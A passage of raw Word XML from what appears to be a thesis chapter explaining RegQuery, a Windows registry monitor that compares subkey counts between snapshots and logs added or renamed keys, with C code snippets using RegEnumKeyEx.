        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 1: Monitoring the Subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 2: Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00A3196D" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If the number of subkey is larger than 0, for each subkey, RegQuery returns specific information belong to that subkey, using a Windows API called “RegEnumKeyEx”. If the current queried subkey is the last subkey in chain</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the variable “aft” is set </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to FALSE (indicates that there wasn’t any event happened in the current query process)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, RegQuery copy </w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name for returning later.</w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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(i=0; i&lt;cSubKeys; i++)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cbName = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LENGTH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegEnumKeyEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, i,</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achKey,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// the current querying subkey name</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&amp;cbName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// size of subkey name</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&amp;ftLastWriteTime);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(retCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"(%d) %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>), i+1, achKey);</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((cSubKeys - 1 == i) &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&amp; !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !i)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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F590C" w:rsidRDefault="003F590C" w:rsidP="003F590C">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p>
    <w:p w:rsidR="00DB2D4C" w:rsidRDefault="00DB2D4C" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery defines a value called “retCode” which stores the return error code when calling RegEnumKeyEx. When the value returned is ERROR_SUCCESS indicating that the function is executed successfully, RegQuery does further steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When “aft” is FALSE, RegQuery also return the number of subkeys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="005512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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cSubKeys;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and the number of value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="005512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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cValues;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00AE6875" w:rsidP="00A3196D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When there is a registry event happened, RegQuery is called with “aft” set to TRUE. At that time, RegQuery defines a variable called “nCount”, which is the different between:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00AE6875" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nSubkeys: The number of subkeys in the </w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRPr="00F05F19" w:rsidRDefault="0055127B" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubkeys: The number of subkeys in the current snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> nCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE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rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; (*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; cSubKeys)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE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nCount = (cSubKeys - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE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AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">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565A7" w:rsidRDefault="002565A7" w:rsidP="00AE6875">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AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nCount &lt; 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>key added to the registry database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Its information could have been added to the last position in the current subkey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">chain. (This is only right for almost key. There </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> some key that has its subkey position arranged by a third party process. Windows Services is an example.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nCount ==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0, there was a subkey modified in registry database. In this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thesis</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we only identified for change in subkey name. When a subkey change its name, it should be move to the last position in the subkey chain.</w:t>
      </w:r>
      <w:r w:rsidR="003F590C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, the previous subkey in the last query is now different from the current subkey in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If nCount &gt; 0, there was a subkey deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002935B6" w:rsidRDefault="002935B6" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="002935B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00290AB6" w:rsidRDefault="003C1ED4" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In the situation when nCount &lt;= 0, the last subkey in the chain is suspicious.</w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In case nCount &lt; 0, we log the subkey which is in the last position of the current subkey chain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2BE7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When nCount = 0, if the name of subkey in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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((cSubKeys - 1 == i) &amp;&amp; aft &amp;&amp; (nCount &gt; 0)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);</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L"DEBUG TIME: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);</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wchTime);</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L"[REGISTRY]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L"[ALERT]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L"Key added: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wchLogKey);</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achKey);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
